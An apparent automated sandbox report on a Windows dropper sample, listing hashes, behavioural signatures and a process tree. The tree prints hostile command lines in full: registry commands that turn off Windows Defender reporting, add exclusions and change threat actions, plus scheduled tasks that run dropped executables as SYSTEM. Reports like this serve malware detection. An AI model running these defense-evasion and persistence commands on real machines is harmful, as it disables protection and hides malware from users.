Analysis
  max time kernel: 149s
  max time network: 151s
  platform: windows10-2004_x64
  resource: win10v2004-20231201-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20231201-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 11/12/2023, 03:12

Static task: static1
Behavioral task: behavioral1
  Sample: e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe
  Resource: win7-20231020-en
General
  Target: e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe
  Size: 7.2MB
  MD5: ce3185730246203700a23e2bca796d99
  SHA1: 0df5c4d7f5352dbe6ffedf575282f09faedf788f
  SHA256: e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8
  SHA512: ce19257d2e6187e3071253b869f62dd119b52425ff58a46c8a644831d01d4652124f0323653a96703929b2a5bafcc2392d2102397cbf8cfc321e859126b8d8c2
  SSDEEP: 196608:91Orab2X1JKmRNu34cJcyd8/1cj+b3Y6pR0c9zw3Zzxaq:3Or2M1JKIuLJJdacw3Y6pR0cuf
Malware Config
Signatures

Blocklisted process makes network request (1 IoC)
  flow 138 | PID 4216 | rundll32.exe

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Control Panel\International\Geo\Nation | Install.exe
  Key value queried: \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Control Panel\International\Geo\Nation | kihxzCQ.exe

Executes dropped EXE (4 IoCs)
  PID 2324 | Install.exe
  PID 5100 | Install.exe
  PID 540 | hFQYnRo.exe
  PID 4536 | kihxzCQ.exe

Loads dropped DLL (1 IoC)
  PID 4216 | rundll32.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Drops Chrome extension (2 IoCs)
  File created: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | kihxzCQ.exe
  File created: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | kihxzCQ.exe

Drops desktop.ini file(s) (1 IoC)
  File opened for modification: C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | kihxzCQ.exe

Drops file in System32 directory (29 IoCs)
Drops file in Program Files directory (14 IoCs)
  File created: C:\Program Files (x86)\hlHvxOmTEzGU2\OXIeBaEYyesMI.dll | kihxzCQ.exe
  File created: C:\Program Files (x86)\DDDIXrwIFTXkC\XFXgLrP.xml | kihxzCQ.exe
  File created: C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | kihxzCQ.exe
  File created: C:\Program Files (x86)\zYDdeyryU\iIidkyK.xml | kihxzCQ.exe
  File created: C:\Program Files (x86)\hlHvxOmTEzGU2\VNGHZNM.xml | kihxzCQ.exe
  File created: C:\Program Files (x86)\UJbqbYGEalpLkUITJzR\PxrQfRp.dll | kihxzCQ.exe
  File created: C:\Program Files (x86)\UJbqbYGEalpLkUITJzR\IdGbxrm.xml | kihxzCQ.exe
  File created: C:\Program Files (x86)\cvlBDCdIHRUn\fSUIaaA.dll | kihxzCQ.exe
  File opened for modification: C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | kihxzCQ.exe
  File created: C:\Program Files (x86)\zYDdeyryU\XeaYeM.dll | kihxzCQ.exe
  File opened for modification: C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | kihxzCQ.exe
  File opened for modification: C:\Program Files\Mozilla Firefox\browser\omni.ja | kihxzCQ.exe
  File created: C:\Program Files (x86)\DDDIXrwIFTXkC\ZXjqWYP.dll | kihxzCQ.exe
  File created: C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | kihxzCQ.exe

Drops file in Windows directory (4 IoCs)
  File created: C:\Windows\Tasks\btngLezmYLEbkDGphz.job | Conhost.exe
  File created: C:\Windows\Tasks\qxdnhmFGwPNMbPaLO.job | Conhost.exe
  File created: C:\Windows\Tasks\VgITaIvscZwKwBA.job | schtasks.exe
  File created: C:\Windows\Tasks\CJutnrVhMflOHRfra.job | schtasks.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 11 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID 1840 | schtasks.exe
  PID 2928 | schtasks.exe
  PID 1624 | schtasks.exe
  PID 3228 | schtasks.exe
  PID 2988 | schtasks.exe
  PID 1188 | schtasks.exe
  PID 3876 | schtasks.exe
  PID 3024 | schtasks.exe
  PID 836 | schtasks.exe
  PID 1496 | schtasks.exe
  PID 3664 | schtasks.exe

Enumerates system info in registry (2 TTPs, 4 IoCs)
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe

Modifies data under HKEY_USERS (64 IoCs)
Suspicious behavior: EnumeratesProcesses (48 IoCs)
Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeDebugPrivilege | PID 3940 | powershell.EXE
  Token: SeDebugPrivilege | PID 968 | powershell.exe
  Token: SeDebugPrivilege | PID 1060 | Conhost.exe
  Token: SeDebugPrivilege | PID 3460 | powershell.EXE

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (each entry gives its depth in the process tree, the image path, the command line, the matched signatures and the PID)

Depth 1: C:\Users\Admin\AppData\Local\Temp\e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe"
  - Suspicious use of WriteProcessMemory
  PID: 4836

Depth 2: C:\Users\Admin\AppData\Local\Temp\7zS4314.tmp\Install.exe
  Command line: .\Install.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID: 2324

Depth 3: C:\Users\Admin\AppData\Local\Temp\7zS4546.tmp\Install.exe
  Command line: .\Install.exe /MmqydidDY "525403" /S
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in System32 directory
  - Enumerates system info in registry
  - Suspicious use of WriteProcessMemory
  PID: 5100

Depth 4: C:\Windows\SysWOW64\forfiles.exe
  Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
  PID: 4920

Depth 5: C:\Windows\SysWOW64\cmd.exe
  Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
  - Suspicious use of WriteProcessMemory
  PID: 556
Depth 4: C:\Windows\SysWOW64\forfiles.exe
  Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
  PID: 2896

Depth 4: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /run /I /tn "gdSwTFDNA"
  PID: 2928

Depth 5: C:\Windows\System32\Conhost.exe
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - Drops file in Windows directory
  PID: 3024

Depth 4: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "gdSwTFDNA" /SC once /ST 00:10:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  (the -EncodedCommand value is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
  - Creates scheduled task(s)
  PID: 1624

Depth 4: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "btngLezmYLEbkDGphz" /SC once /ST 03:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\hFQYnRo.exe\" Bp /mDsite_idngL 525403 /S" /V1 /F
  - Creates scheduled task(s)
  PID: 3024

Depth 4: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /DELETE /F /TN "gdSwTFDNA"
  PID: 4016
Depth 1: C:\Windows\SysWOW64\cmd.exe
  Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
  - Suspicious use of WriteProcessMemory
  PID: 2472

Depth 2: \??\c:\windows\SysWOW64\reg.exe
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
  PID: 1428

Depth 2: \??\c:\windows\SysWOW64\reg.exe
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
  PID: 516

Depth 1: \??\c:\windows\SysWOW64\reg.exe
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
  PID: 5064

Depth 1: \??\c:\windows\SysWOW64\reg.exe
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
  PID: 836
Depth 1: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  (the -EncodedCommand value is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force; this is the command line registered by the "gdSwTFDNA" scheduled task)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 3940

Depth 2: C:\Windows\system32\gpupdate.exe
  Command line: "C:\Windows\system32\gpupdate.exe" /force
  PID: 4000

Depth 1: C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
  PID: 2084

Depth 1: C:\Windows\system32\gpscript.exe
  Command line: gpscript.exe /RefreshSystemParam
  PID: 1352

Depth 1: C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
  PID: 4128
Depth 1: C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\hFQYnRo.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\hFQYnRo.exe Bp /mDsite_idngL 525403 /S
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID: 540

Depth 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 968
C:\Windows\SysWOW64\reg.exe [level 3, PID 1164]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 2668]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 4000]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 3888]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 3228]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 1416]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 4344]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 2968]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 388]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 1420]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 4240]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 3676]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 2876]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 3168]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 4268]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 4164]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 4720]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 4536]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 4652]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 752]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 3416]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 3176]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 4908]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 800]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 1856]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 4700]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 1012]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\cmd.exe [level 3, PID 3692]
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
- Suspicious use of WriteProcessMemory
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [level 2, PID 1060]
    pow​ershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DDDIXrwIFTXkC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DDDIXrwIFTXkC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UJbqbYGEalpLkUITJzR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UJbqbYGEalpLkUITJzR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cvlBDCdIHRUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cvlBDCdIHRUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hlHvxOmTEzGU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hlHvxOmTEzGU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zYDdeyryU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zYDdeyryU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VYfzEhPxBNNTaEVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VYfzEhPxBNNTaEVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\zlCauFJzutozcZAJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\zlCauFJzutozcZAJ\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\reg.exe [level 3, PID 4380]
